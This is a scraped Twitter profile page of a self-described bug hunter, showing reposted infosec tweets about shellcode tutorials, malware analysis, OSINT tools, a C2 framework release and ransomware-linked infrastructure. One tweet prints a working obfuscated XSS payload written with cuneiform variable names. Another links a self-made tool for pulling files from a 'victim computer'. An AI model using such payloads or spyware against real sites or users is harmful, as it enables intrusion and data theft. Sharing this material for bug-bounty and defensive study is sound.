Security Talent (@securi3ytalent) 's Twitter Profile
Security Talent

@securi3ytalent

JS Dev | Bug hunter | Penetration Tester

ID: 1451274687271497728

linkhttp://securitytalent.net calendar_today21-10-2021 19:50:48

260 Tweet

424 Takipçi

2,2K Takip Edilen

Binni Shah (@binitamshah) 's Twitter Profile Photo

macOS Malware Analysis : PKG Files : malwr4n6.com/post/macos-mal… credits Bhargav Rathod Dealing with PE File Padding during Malware Analysis : malwr4n6.com/post/dealing-w…

Security Talent (@securi3ytalent) 's Twitter Profile Photo

Introduction to windows shellcode development series. PART 1: securitycafe.ro/2015/10/30/int… PART 2: securitycafe.ro/2015/12/14/int… PART 3: securitycafe.ro/2016/02/15/int… Malware sample DB: securitytalent.net #infosec #cybersecurity #malware #securityTalent #redteam #exploit #shellcode

Introduction to windows shellcode development series. 

PART 1: securitycafe.ro/2015/10/30/int…

PART 2: securitycafe.ro/2015/12/14/int…
PART 3: securitycafe.ro/2016/02/15/int…

Malware sample DB:
securitytalent.net

#infosec  #cybersecurity  #malware #securityTalent #redteam #exploit #shellcode
Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer) 's Twitter Profile Photo

WEBCAPTURE: A Python-based OSINT recon tool that automates the extraction of website metadata, HTTP headers, and captures screenshots for visual intel Link: github.com/drackyjr/WEBCA…

VIEH Group (@viehgroup) 's Twitter Profile Photo

an XSS payload, Cuneiform-alphabet based 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() #bugbounty #bugbountytips #cybersecurity

an XSS payload, Cuneiform-alphabet based

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

#bugbounty #bugbountytips #cybersecurity
0xor0ne (@0xor0ne) 's Twitter Profile Photo

Reverse engineering string obfuscation in NodeJS Malware by parsing the Abstract Syntax Tree (AST) dinohacks.com/posts/2025/202… #malware #infosec

Reverse engineering string obfuscation in NodeJS Malware by parsing the Abstract Syntax Tree (AST)

dinohacks.com/posts/2025/202…

#malware #infosec
Security Talent (@securi3ytalent) 's Twitter Profile Photo

Download the victim computer file via the given single link small project javascript github.com/securi3ytalent… #Malware #MalwareThreats #malwareDevelopment #spy #hacking

Download the victim computer file via the given single link small project javascript 
 github.com/securi3ytalent…

#Malware #MalwareThreats #malwareDevelopment #spy #hacking
Security Talent (@securi3ytalent) 's Twitter Profile Photo

Telegram Maltego: A free set of Transforms for Maltego that enables OSINT investigations in the Telegram messenger github.com/vognik/maltego… t.me/Securi3yTalent

0x6rss (@0x6rss) 's Twitter Profile Photo

WhatsApp messages that seem to come from someone even though they never sent anything? No clicks, no permissions. Just a few technical steps! I demonstrated a manipulation technique for digital forensics experts. Blog post: cti.monster/blog/2025/07/2… PoC: github.com/0x6rss/whatsap…

HackerRalf (@hacker_ralf) 's Twitter Profile Photo

AdaptixC2 v0.7 is out! github.com/Adaptix-Framew… * AxScript scripting support * Credential Manager added * BOF support in the Gopher agent * New BOFs: potato-dcom, nanodump, noconsolation Full update details: adaptix-framework.gitbook.io/adaptix-framew…

AdaptixC2 v0.7 is out!

github.com/Adaptix-Framew…

* AxScript scripting support
* Credential Manager added
* BOF support in the Gopher agent
* New BOFs: potato-dcom, nanodump, noconsolation

Full update details: adaptix-framework.gitbook.io/adaptix-framew…
Intigriti (@intigriti) 's Twitter Profile Photo

Hakoriginfinder by Luke Stephens (hakluke) is a simple tool to quickly identify the origin hosts of targets behind firewalls, CDNs, and other types of reverse proxies! 🤠 🔗 github.com/hakluke/hakori…

Hakoriginfinder by <a href="/hakluke/">Luke Stephens (hakluke)</a> is a simple tool to quickly identify the origin hosts of targets behind firewalls, CDNs, and other types of reverse proxies! 🤠 

🔗 github.com/hakluke/hakori…
Fox_threatintel (@banthisguy9349) 's Twitter Profile Photo

Our friend is still active on this IP, related to Systembc and some ransomware samples urlhaus.abuse.ch/host/94.198.53… #opendir

Our friend is still active on this IP, related to Systembc and some ransomware samples urlhaus.abuse.ch/host/94.198.53…

#opendir